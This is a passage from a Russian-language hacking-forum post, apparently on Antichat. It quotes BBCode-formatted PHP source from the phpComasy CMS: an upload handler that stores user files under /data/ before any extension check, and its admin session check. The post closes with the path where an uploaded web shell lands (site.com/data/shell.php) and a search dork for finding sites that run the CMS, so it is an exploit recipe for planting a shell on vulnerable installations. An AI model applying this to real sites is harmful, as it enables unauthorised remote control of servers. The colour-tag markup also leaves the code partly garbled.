[/COLOR][COLOR="#0000BB"]$new_filename[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]str_replace[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]" "[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"_"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]web[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]tools[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]special_chars_to_html[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]path[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$_FILES[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'file'[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#DD0000"]'name'[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#0000BB"]false[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]true[/COLOR][COLOR="#007700"]));

[/
COLOR][COLOR="#0000BB"]$new_filename_without_path[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]str_replace[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]" "[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"_"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]web[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]tools[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]special_chars_to_html[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_FILES[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'file'[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#DD0000"]'name'[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#0000BB"]false[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]true[/COLOR][COLOR="#007700"]));



[/COLOR][COLOR="#0000BB"]move_uploaded_file[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_FILES[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'file'[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#DD0000"]'tmp_name'[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#0000BB"]__ABSOLUTE_PATH[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'/data/'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$new_filename[/COLOR][COLOR="#007700"]);



if
(([/COLOR][COLOR="#0000BB"]$extention[/COLOR][COLOR="#007700"]==[/COLOR][COLOR="#DD0000"]".png"[/COLOR][COLOR="#007700"]) || ([/COLOR][COLOR="#0000BB"]$extention[/COLOR][COLOR="#007700"]==[/COLOR][COLOR="#DD0000"]".gif"[/COLOR][COLOR="#007700"]) || ([/COLOR][COLOR="#0000BB"]$extention[/COLOR][COLOR="#007700"]==[/COLOR][COLOR="#DD0000"]".jpg"[/COLOR][COLOR="#007700"]) || ([/COLOR][COLOR="#0000BB"]$extention[/COLOR][COLOR="#007700"]==[/COLOR][COLOR="#DD0000"]".jpeg"[/COLOR][COLOR="#007700"])) {

[/
COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]web[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]message[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]send_message[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]_MESSAGE_FILE_UPLOAD_SUCCESSFUL[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'&action=image_convert_form&path='[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]path[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'&file='[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$new_filename_without_path[/COLOR][COLOR="#007700"]);

}

else {

[/
COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]web[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]message[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]send_message[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]_MESSAGE_FILE_UPLOAD_SUCCESSFUL[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'&action=file_manager&path='[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]path[/COLOR][COLOR="#007700"]);

}

}

else {

[/
COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]web[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]message[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]send_message[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]_MESSAGE_REQUIRED_PARAMETER[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'&action=file_upload_form&path='[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]path[/COLOR][COLOR="#007700"]);

}

}

else {[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]web[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]message[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]send_message[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]_MESSAGE_NO_PERMISSION[/COLOR][COLOR="#007700"]);}

}

[/
COLOR][/COLOR
classes/class.security.php

PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]function[/COLOR][COLOR="#0000BB"]check_security[/COLOR][COLOR="#007700"]() {

if ((!empty([/COLOR][COLOR="#0000BB"]$_SESSION[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'user_id'[/COLOR][COLOR="#007700"]]) ) && (!empty([/COLOR][COLOR="#0000BB"]$_SESSION[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'user_username'[/COLOR][COLOR="#007700"]])) && (@[/COLOR][COLOR="#0000BB"]$_SESSION[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'user_role'[/COLOR][COLOR="#007700"]] ==[/COLOR][COLOR="#DD0000"]'admin'[/COLOR][COLOR="#007700"])) {

[/
COLOR][COLOR="#FF8000"]// additional check (phpcomasy url)

[/COLOR][COLOR="#007700"]if ([/COLOR][COLOR="#0000BB"]$_SESSION[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'user_url'[/COLOR][COLOR="#007700"]] ==[/COLOR][COLOR="#0000BB"]__WEB_PATH[/COLOR][COLOR="#007700"]) {

return[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"];

}

else {

return[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"];

}

}

else {

return[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"];

}

}

[/
COLOR][/COLOR
Shell: http://site.com/data/shell.php

Dork: powered by phpComasy
 
Ответить с цитированием
Ответ



Предыдущая тема Следующая тема
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Библиотека SladerNon Болталка 17 05.02.2007 23:30



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.